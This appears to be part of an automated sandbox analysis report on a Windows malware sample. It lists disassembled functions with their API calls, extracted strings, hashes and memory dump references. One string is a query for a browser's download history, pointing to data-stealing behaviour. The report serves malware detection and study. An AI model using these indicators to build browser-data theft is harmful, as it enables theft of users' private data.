                                                                                                                                                                                                                                                          • Opcode ID: de56811e66f5dc2fcf7331bb7a65f652ac56e8de4142d2db9f90690d5470e576
                                                                                                                                                                                                                                                          • Instruction ID: 3884d29ddb84c667f635403393c52013d6ae2c55b988ebad42665481c159c1e4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de56811e66f5dc2fcf7331bb7a65f652ac56e8de4142d2db9f90690d5470e576
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9901AC31510565EFEB02AF51CC44FAEB7BCFB05755F104626E921E2990D7749504CA90
                                                                                                                                                                                                                                                          Function 00FE13E6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00FE13F2
                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00FE13FD
                                                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00FE1406
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CapsCreateDeviceRelease
                                                                                                                                                                                                                                                          • String ID: F(t$DISPLAY
                                                                                                                                                                                                                                                          • API String ID: 1843228801-2132287661
                                                                                                                                                                                                                                                          • Opcode ID: 4c39be577c221ec9fddfa585cda26cc875742aa1ff2891beb2f176d601def597
                                                                                                                                                                                                                                                          • Instruction ID: a9c1e289ba310bcc7ae033ce36d873301eb75de843453cd1c755ae13a6626349
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c39be577c221ec9fddfa585cda26cc875742aa1ff2891beb2f176d601def597
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FD012353803027BE2316751BC0EF1A2964E7C6F02F100004F3415C0C846991002A736
                                                                                                                                                                                                                                                          Function 00FE933E Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 192stringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FE9542
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FE955D
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                                                                                                          • String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
                                                                                                                                                                                                                                                          • API String ID: 2500673778-2241552939
                                                                                                                                                                                                                                                          • Opcode ID: 8ac920029d51e7dc86e55d5e51a43e758091008456b9d60f8d07d71d33aa9a03
                                                                                                                                                                                                                                                          • Instruction ID: 56cddf514ce65a35d4d70ac7164710e3509caea76e9b21dcd200a137c4b40710
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ac920029d51e7dc86e55d5e51a43e758091008456b9d60f8d07d71d33aa9a03
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D71943290015D9BCF40FBA6ED469EEB774AF04301F514421FA40B7167DBA9BE06ABD1
                                                                                                                                                                                                                                                          Function 00FFB6A3 Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00FFB6F0
                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00FFB728
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: File$CreatePointer
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2024441833-0
                                                                                                                                                                                                                                                          • Opcode ID: 8538438f05f2e9478205bf5f8fb445276d03594f4ea3e3c6ca57ff7336677cb2
                                                                                                                                                                                                                                                          • Instruction ID: f784cbae72bafc9ff297ee67c11efb88f35a22f2f2585886b9e0d0ea201a2cce
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8538438f05f2e9478205bf5f8fb445276d03594f4ea3e3c6ca57ff7336677cb2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A23165B2904709DFDB30AF25C8C4B33BAD8AF54364F20CA2EF29782564D3349884AF51
                                                                                                                                                                                                                                                          Function 010051B3 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _freemalloc
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3576935931-0
                                                                                                                                                                                                                                                          • Opcode ID: 1c4ceae8a281b9ab8b8c98597a2d4b677e3591a01e25c8b0aef1b8a59b9b1d5c
                                                                                                                                                                                                                                                          • Instruction ID: 6135a356b6e957794914aa7754bd45eb768d19a79e57f3ce439a56865ebcac75
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c4ceae8a281b9ab8b8c98597a2d4b677e3591a01e25c8b0aef1b8a59b9b1d5c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A11A332944616ABFF336B78BC0469D3BD5BF4A2A1F108565F9C99A1D0EA36D8408F90
                                                                                                                                                                                                                                                          Function 00FF2331 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 36stringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(?,00FE83BD,10000000,00000000,?,00FE83BD,00000000), ref: 00FF233C
                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(012C9310,?,00000000,00000104), ref: 00FF2355
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FF2367
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00FF2379
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                                                                                                          • String ID: %s%s
                                                                                                                                                                                                                                                          • API String ID: 1206339513-3252725368
                                                                                                                                                                                                                                                          • Opcode ID: 3d856f0f5595172b902f3b01100ec24e23d484d9a360b024e53bdfe694c7f7d4
                                                                                                                                                                                                                                                          • Instruction ID: 25008e64546b2db696c54182336ccdc3fd247392a14f40cb241facf1315fbcd1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d856f0f5595172b902f3b01100ec24e23d484d9a360b024e53bdfe694c7f7d4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EBF0E932100119BFDB111F59EC4CDA7BF6DEF456A5B044125FA08D7210C7B55D109BE5
                                                                                                                                                                                                                                                          Function 010061B9 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 010061C5
                                                                                                                                                                                                                                                            • Part of subcall function 010043F4: __getptd_noexit.LIBCMT ref: 010043F7
                                                                                                                                                                                                                                                            • Part of subcall function 010043F4: __amsg_exit.LIBCMT ref: 01004404
                                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 010061DC
                                                                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 010061EA
                                                                                                                                                                                                                                                          • __lock.LIBCMT ref: 010061FA
                                                                                                                                                                                                                                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0100620E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 938513278-0
                                                                                                                                                                                                                                                          • Opcode ID: 20afbc787947e098c55e0a3da01cb6fac01daa894a82a16a12d84bb412ca98f3
                                                                                                                                                                                                                                                          • Instruction ID: a9cb5baec734e5904e95e0c990247f090b9a3b9a81cb1704371058d6a4c2edc8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20afbc787947e098c55e0a3da01cb6fac01daa894a82a16a12d84bb412ca98f3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83F02432E403019BFB63FB7C98027DE37E1AF10760F084269E1C0AB1D2CB3A9550EA49
                                                                                                                                                                                                                                                          Function 6CD1F360 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 449COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 6CD4C710: setsockopt.WS2_32(?,00000006,00000001,00000004,00000004), ref: 6CD4C72F
                                                                                                                                                                                                                                                            • Part of subcall function 6CD4C710: WSAGetLastError.WS2_32(?,00000004,00000020), ref: 6CD4C73C
                                                                                                                                                                                                                                                          • closesocket.WS2_32(?), ref: 6CD1F76A
                                                                                                                                                                                                                                                          • closesocket.WS2_32(?), ref: 6CD1F7A8
                                                                                                                                                                                                                                                          • closesocket.WS2_32(?), ref: 6CD1FA6C
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • a Display implementation returned an error unexpectedly/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\string.rs, xrefs: 6CD1FA3D
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
